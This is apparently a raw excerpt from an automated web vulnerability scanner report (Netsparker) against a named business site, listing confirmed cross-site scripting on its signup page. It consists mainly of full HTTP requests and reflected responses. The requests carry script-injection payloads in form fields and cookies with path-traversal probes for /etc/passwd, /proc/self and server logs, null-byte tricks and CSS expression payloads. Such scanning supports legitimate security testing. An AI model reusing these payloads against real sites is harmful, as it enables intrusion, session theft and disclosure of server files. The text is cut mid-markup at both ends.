onclick="javascript:submitLogin();checkScreenWidth();" onkeypress="checkEnterKey(event)"><img src="/images/loginBtn.gif" border="0" onkeypress="checkEnterKey(event)" tabindex="4" alt="Login"/></a> </div> </div> <div style="float:left; padding:2px 0 0 0;"> <input type="hidden" name="_rememberme"> <div style="float:left;padding:0px 0 0 10px;"><input tabindex="3" type="checkbox" name="rememberme" value="true" /></div> <div style="float:left;padding:3px 0 0 2px;color:#777777;font-size:10px;font-weight:bold;">Remember Me</div> <div style="float:left;padding:3px 0 0 20px;color:#777777;font-size:10px; font-weight:bold;"> <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </div> <div style="padding: 3px 0pt 0pt 10px; float: left;"><a href="/communitysignup.html" style="color:#777777; font-size: 10px; font-weight: bold;" class="greyBs">Register Now</a></div> </div> </div> </form> </div> <div style="float:left;padding:17px 0 0 0; width:110px;color:black;font-size:11px" id="blkShare"> <script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#tabs=web%2Cpost%2Cemail&amp;charset=utf-8&amp;style=default&amp;publisher=c17cda91-72c8-497c-bea7-a4d4698b5bb5&offsetLeft=-349"></script> </div> <img style="display:none;" src="/images/spacer.gif" onload="trackingPageContent('Community Signup',0,'')" alt="Home" /> </div> </div> <div class="clear"></div> <div class="punchLine">Where Business Services Buyers & Sellers Connect</div> <div class="float-left" style="width:550px;"> <ul id="headerNav" class="headerNav headerHomeActive"> <li class="headerHome"><a href="/index.html" onMouseOver="toggleHeader(0, 'headerHomeActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Home</a></li> <li class="headerAdvertise"><a href="/advertise.html" onMouseOver="toggleHeader(0, 'headerAdvertiseActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Advertise</a></li> <li class="headerPartner"><a href="/partner.html" onMouseOver="toggleHeader(0, 'headerPartnerActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Partner</a></li> <li class="headerAboutus"><a href="/aboutUs.html" onMouseOver="toggleHeader(0, 'headerAboutusActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">About Us</a></li> <li class="headerResources"><a href="/communitymainpage.html" onMouseOver="toggleHeader(0, 'headerResourcesActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Resources</a></li> <li class="headerContactus"><a href="/contactUs.html" onMouseOver="toggleHeader(0, 'headerContactusActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Contact us</a></li> </ul> </div> <div class="clear"></div> </div> <div style="clear:both;"></div> <div id="forgotPasswordPopUpLayerBody" style="*left:15%;*top:18%;"></div> </div> <!--Header End's Here--> <!--Mid Container Start's Here--> <div id="midSectionBox"> <!--midsection part starts--> <script type="text/javascript"> function invertValue(y){ var x=document.getElementById(y).value if(x==0) { document.getElementById(y).value=1 } if(x==1) { document.getElementById(y).value=0 }}</script><div style="background:url(/images/midSliceMain.gif);"> <div style="width:850px; height:740px; margin:auto; padding-top:20px;"> <!-----left Section--------> <div style="width:530px; height:auto; float:left;"> <div id="communityLogin"> <div style="width:492px; height:84px; border:1px solid #eeeeee;"> <form method="post" id="communityLoginId"> <input type="hidden" name="refererUrl" value="http://www.insideup.com/index.html"> <table width="96%" border="0" align="right" cellpadding="0" cellspacing="0"> <tr> <td width="27%" height="70" style="font:bold 12px Arial, Helvetica, sans-serif; color:#777777;">Already A Member?</td> <td width="53%" valign="bottom" style="font:bold 12px Arial, Helvetica, sans-serif; color:#777777; padding-top:22px;">&nbsp; <input name="username" value="username" type="text" onclick="clearInput(this);" onfocus="clearInput(this);" id="textfield" style="width:110px; padding:3px 0 0 3px; height:20px; border:1px solid #cccccc; margin-left:5px;" onkeypress="checkEnterKey(event)" /> <input type="password" name="password" id="textfield" style="width:110px; height:22px; border:1px solid #cccccc; padding:3px 0 0 3px; height:20px; margin-left:5px;" value="password" onclick="clearInput(this);" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" /> <span style="padding-left: 10px; line-height: 12px;"> <input type="hidden" name="_rememberme"> <input type="checkbox" name="rememberme" id="checkbox" value="true" /> <span style="color:#777777;font-size:10px;font-weight:bold;text-decoration:none;">Remember Me</span> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </span> </td> <td width="22%" style="padding-top:6px;">&nbsp; <a href="javascript:void(0);" onclick="javascript:submitCommunityLogin();checkScreenWidth();"><img src="images/ComunityLogin.png" border="0" alt="Login"/></a> </td> </tr> </table> </form> </div> </div> <form method="post" action="communitysignup.html"> <input type="hidden" name="refererUrl" value='http://www.insideup.com/index.html'/> <div> <table width="496" border="0" cellspacing="0" cellpadding="0" style="margin-top:20px;"> <tr> <td colspan="2" style="font:bold 22px Arial, Helvetica, sans-serif; color:#181818;">Create Your Free Account</td> </tr> <tr> <td height="24" colspan="2" style="font:normal 12px Arial, Helvetica, sans-serif; color:#181818;">To gain free access to the InsideUp community please complete this short registration.</td> </tr> <tr> <td width="131" height="50" align="right" style="font:normal 12px Arial, Helvetica, sans-serif; color:#212121">Username <span style="color:#dc0000">*</span></td> <td width="365"> <input type="text" name="pseudonym" value="3" id="pseudonym" style="width:280px; height:18px; padding-top:3px; margin-left:10px;" class="inputbox123 " /> </td> </tr> <tr> <td height="50" align="right" style="font:normal 12px Arial, Helvetica, sans-serif; color:#212121">Email <span style="color:#dc0000">*</span></td> <td> <input type="text" name="emailAddress" value="'"--></style></script><script>netsparker(0x00132..
- /communitysignup.html

/communitysignup.html CONFIRMED

http://www.insideup.com/communitysignup.html

Parameters

Parameter Type Value
refererUrl POST '"--></style></script><script>alert(0x001330)</script>
pseudonym POST 3
emailAddress POST netsparker@example.com
firstName POST Smith
lastName POST Smith
companyName POST Smith
password1 POST 3
password2 POST 3
termsOfService POST 1
receiveSpecialOfferEmail POST 1
x POST 0
y POST 0

Request

POST /communitysignup.html HTTP/1.1
Referer: http://www.insideup.com/communitysignup.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Cookie: OAVARS[../../../../../../../../../../proc/self/fd/2\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Content-Length: 271
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

refererUrl='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x001330)%3c%2fscript%3e&pseudonym=3&emailAddress=netsparker%40example.com&firstName=Smith&lastName=Smith&companyName=Smith&password1=3&password2=3&termsOfService=1&receiveSpecialOfferEmail=1&x=0&y=0

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:41:46 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=0C3F09D7389E625F519BE2753FCF2C0C; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta name="keywords" content="InsideUp, business, wiki, advertise, business category, vendors, ratings, business service, technology, leads, community, social networking, referral, reference, share, San Diego, commerce, b2b, trade, industry, selling, production, big business, dealing, corporation, conglomerate, establishment, partnership, firm, multinational, transnational, small business, enterprise, venture, organization, transaction, contract, commercial, occupational, corporate, publicize, market, search, forum, forums, discuss, share, information"/> <meta name="description" content="Join your community and share your services!"/> <meta name="robots" content="index; follow"/> <title>Share your services and experiences with your community.</title> <link rel="stylesheet" type="text/css" href="/css/mainNewInsideup.css" />
<link rel="stylesheet" type="text/css" href="/css/calendar.css" /> <script type="text/javascript" src="/js/jquery-1.2.1.js"></script> <script type="text/javascript" src="/js/ajax.js"></script> <script type="text/javascript" src="/js/ajax-dynamic-list.js"></script> <script type="text/javascript" src="/js/default.js"></script> <script type="text/javascript" src="/js/calendar.js" ></script> <script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-5083151-1"); pageTracker._setDomainName(".insideup.com"); pageTracker._trackPageview(); } catch(err) {} </script></head><body> <div id="mainContainer">
<!--Header Start's Here--> <div class="header"> <!---put header section here--> <script language="javascript">function clearInput(e){if(e.value=='username'||e.value=='password'){e.value="";} }</script> <style>.c_767676, a.c_767676:link, a.c_767676:visited { color:#767676; text-decoration:none; font:bold 14px Arial;}a.c_767676:hover { color:#767676; text-decoration:underline; font:bold 14px Arial;}</style> <div class="h-container"> <div> <div class="float-left logo"><a href="/index.html"><img src="/images/logo.png" alt="InsideUp Logo" width="157" height="78"></a></div> <div style="float:left;padding:10px 0 0 10px;"> <div style="float:left;padding:7px 0px 0 0;font-size:11px;color:#777777;font-weight:bold;">Your City:</div> <div style="float:left;padding:0px 0 0 7px; width:123px;color:#2B70CD;font-weight:bold;font-size:9px;"> <div style="float:left;width:135px; padding:2px 10px 0 0;"> <select style="width:128px;color:#2B70CD;font-weight:bold;font-size:9px;" id="cityselectbox" name="cityselectbox" onchange="updateUserSessionCity();"> <option value="Albuquerque" >Albuquerque</option> <option value="Atlanta" >Atlanta</option> <option value="Austin" >Austin</option> <option value="Baltimore" >Baltimore</option> <option value="Boston" >Boston</option> <option value="Charlotte" >Charlotte</option> <option value="Chicago" >Chicago</option> <option value="Cincinnati" >Cincinnati</option> <option value="Cleveland" >Cleveland</option> <option value="Columbus" >Columbus</option> <option value="Dallas" selected=selected >Dallas</option> <option value="Denver" >Denver</option> <option value="Detroit" >Detroit</option> <option value="El Paso" >El Paso</option> <option value="Fort Worth" >Fort Worth</option> <option value="Fresno" >Fresno</option> <option value="Honolulu" >Honolulu</option> <option value="Houston" >Houston</option> <option value="Indianapolis" >Indianapolis</option> <option value="Jacksonville" >Jacksonville</option> <option value="Kansas City" >Kansas City</option> <option value="Las Vegas" >Las Vegas</option> <option value="Los Angeles" >Los Angeles</option> <option value="Memphis" >Memphis</option> <option value="Mesa" >Mesa</option> <option value="Miami" >Miami</option> <option value="Milwaukee" >Milwaukee</option> <option value="Minneapolis-St. Paul" >Minneapolis-St. Paul</option> <option value="Nashville" >Nashville</option> <option value="New Orleans" >New Orleans</option> <option value="New York" >New York</option> <option value="Newark" >Newark</option> <option value="Oakland" >Oakland</option> <option value="Orlando" >Orlando</option> <option value="Philadelphia" >Philadelphia</option> <option value="Phoenix" >Phoenix</option> <option value="Pittsburgh" >Pittsburgh</option> <option value="Portland" >Portland</option> <option value="Raleigh" >Raleigh</option> <option value="San Diego" >San Diego</option> <option value="Sacramento" >Sacramento</option> <option value="San Antonio" >San Antonio</option> <option value="San Francisco" >San Francisco</option> <option value="San Jose" >San Jose</option> <option value="Seattle" >Seattle</option> <option value="St. Louis" >St. Louis</option> <option value="Tampa" >Tampa</option> <option value="Tucson" >Tucson</option> <option value="Tulsa" >Tulsa</option> <option value="Washington D.C." >Washington D.C.</option> </select> </div> </div> </div> <div> <div id="loginAndMemberContainer"> <form id="loginForm" method="post"> <input type="hidden" name="refererUrl" value="'"--></style></script><script>netsparker(0x001330)</script>"> <div style="width:320px;height:55px;float:left;padding:10px 0 0 5px;"> <div> <div style="float:left;padding:0px 0 0 10px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="username" type="text" value="username" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="1"/> </div> <div style="float:left;padding:0px 0 0 8px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="password" type="password" value="password" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="2" /> </div> <div style="float:left;padding:0px 0 0 8px;"> <a href="javascript:void(0);" onclick="javascript:submitLogin();checkScreenWidth();" onkeypress="checkEnterKey(event)"><img src="/images/loginBtn.gif" border="0" onkeypress="checkEnterKey(event)" tabindex="4" alt="Login"/></a> </div> </div> <div style="float:left; padding:2px 0 0 0;"> <input type="hidden" name="_rememberme"> <div style="float:left;padding:0px 0 0 10px;"><input tabindex="3" type="checkbox" name="rememberme" value="true" /></div> <div style="float:left;padding:3px 0 0 2px;color:#777777;font-size:10px;font-weight:bold;">Remember Me</div> <div style="float:left;padding:3px 0 0 20px;color:#777777;font-size:10px; font-weight:bold;"> <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </div> <div style="padding: 3px 0pt 0pt 10px; float: left;"><a href="/communitysignup.html" style="color:#777777; font-size: 10px; font-weight: bold;" class="greyBs">Register Now</a></div> </div> </div> </form> </div> <div style="float:left;padding:17px 0 0 0; width:110px;color:black;font-size:11px" id="blkShare"> <script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#tabs=web%2Cpost%2Cemail&amp;charset=utf-8&amp;style=default&amp;publisher=c17cda91-72c8-497c-bea7-a4d4698b5bb5&offsetLeft=-349"></script> </div> <img style="display:none;" src="/images/spacer.gif" onload="trackingPageContent('Community Signup',0,'')" alt="Home" /> </div> </div> <div class="clear"></div> <div class="punchLine">Where Business Services Buyers & Sellers Connect</div> <div class="float-left" style="width:550px;"> <ul id="headerNav" class="headerNav headerHomeActive"> <li class="headerHome"><a href="/index.html" onMouseOver="toggleHeader(0, 'headerHomeActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Home</a></li> <li class="headerAdvertise"><a href="/advertise.html" onMouseOver="toggleHeader(0, 'headerAdvertiseActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Advertise</a></li> <li class="headerPartner"><a href="/partner.html" onMouseOver="toggleHeader(0, 'headerPartnerActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Partner</a></li> <li class="headerAboutus"><a href="/aboutUs.html" onMouseOver="toggleHeader(0, 'headerAboutusActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">About Us</a></li> <li class="headerResources"><a href="/communitymainpage.html" onMouseOver="toggleHeader(0, 'headerResourcesActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Resources</a></li> <li class="headerContactus"><a href="/contactUs.html" onMouseOver="toggleHeader(0, 'headerContactusActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Contact us</a></li> </ul> </div> <div class="clear"></div> </div> <div style="clear:both;"></div> <div id="forgotPasswordPopUpLayerBody" style="*left:15%;*top:18%;"></div> </div> <!--Header End's Here--> <!--Mid Container Start's Here--> <div id="midSectionBox"> <!--midsection part starts--> <script type="text/javascript"> function invertValue(y){ var x=document.getElementById(y).value if(x==0) { document.getElementById(y).value=1 } if(x==1) { document.getElementById(y).value=0 }}</script><div style="background:url(/images/midSliceMain.gif);"> <div style="width:850px; height:740px; margin:auto; padding-top:20px;"> <!-----left Section--------> <div style="width:530px; height:auto; float:left;"> <div id="communityLogin"> <div style="width:492px; height:84px; border:1px solid #eeeeee;"> <form method="post" id="communityLoginId"> <input type="hidden" name="refererUrl" value="'"--></style></script><script>netsparker(0x001330)</script>"> <table width="96%" border="0" align="right" cellpadding="0" cellspacing="0"> <tr> <td width="27%" height="70" style="font:bold 12px Arial, Helvetica, sans-serif; color:#777777;">Already A Member?</td> <td width="53%" valign="bottom" style="font:bold 12px Arial, Helvetica, sans-serif; color:#777777; padding-top:22px;">&nbsp; <input name="username" value="username" type="text" onclick="clearInput(this);" onfocus="clearInput(this);" id="textfield" style="width:110px; padding:3px 0 0 3px; height:20px; border:1px solid #cccccc; margin-left:5px;" onkeypress="checkEnterKey(event)" /> <input type="password" name="password" id="textfield" style="width:110px; height:22px; border:1px solid #cccccc; padding:3px 0 0 3px; height:20px; margin-left:5px;" value="password" onclick="clearInput(this);" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" /> <span style="padding-left: 10px; line-height: 12px;"> <input type="hidden" name="_rememberme"> <input type="checkbox" name="rememberme" id="checkbox" value="true" /> <span style="color:#777777;font-size:10px;font-weight:bold;text-decoration:none;">Remember Me</span> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </span> </td> <td width="22%" style="padding-top:6px;">&nbsp; <a href="javascript:void(0);" onclick="javascript:submitCommunityLogin();checkScreenWidth();"><img src="images/ComunityLogin.png" border="0" alt="Login"/></a> </td> </tr> </table> </form> </div> </div> <form method="post" action="communitysignup.html"> <input type="hidden" name="refererUrl" value='&#039;&#034;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;script&gt;netsparker(0x001330)&lt;/script&gt;'/> <div> <table width="496" border="0" cellspacing="0" cellpadding="0" style="margin-top:20px;"> <tr> <td colspan="2" style="font:bold 22px Arial, Helvetica, sans-serif; color:#181818;">Create Your Free Account</td> </tr> <tr> <td height="24" colspan="2" style="font:normal 12px Arial, Helvetica, sans-serif; color:#181818;">To gain free access to the InsideUp community please complete this short registration.</td> </tr> <tr> <td width="131" height="50" align="right" style="font:normal 12px Arial, Helvetica, sans-serif; color:#212121">Username <span style="color:#dc0000">*</span></td> <td width="365"> <input type="text" name="pseudonym" value="3" id="pseudonym" style="width:280px; height:18px; padding-top:3px; margin-left:10px;" class="inputbox123 " /> </td> </tr> <tr> <td height="50" align="right" style="font:normal 12px Arial, Helvetica, sans-serif; color:#212121">Email <span style="color:#dc0000">*</span></td> <..
- /communitysignup.html

/communitysignup.html CONFIRMED

http://www.insideup.com/communitysignup.html

Parameters

Parameter Type Value
refererUrl POST http://www.insideup.com/index.html
pseudonym POST 3
emailAddress POST netsparker@example.com
firstName POST '"--></style></script><script>alert(0x001336)</script>
lastName POST Smith
companyName POST Smith
password1 POST 3
password2 POST 3

Request

POST /communitysignup.html HTTP/1.1
Referer: http://www.insideup.com/communitysignup.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Cookie: OAVARS[../../../../../../../../../../proc/self/fd/2\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 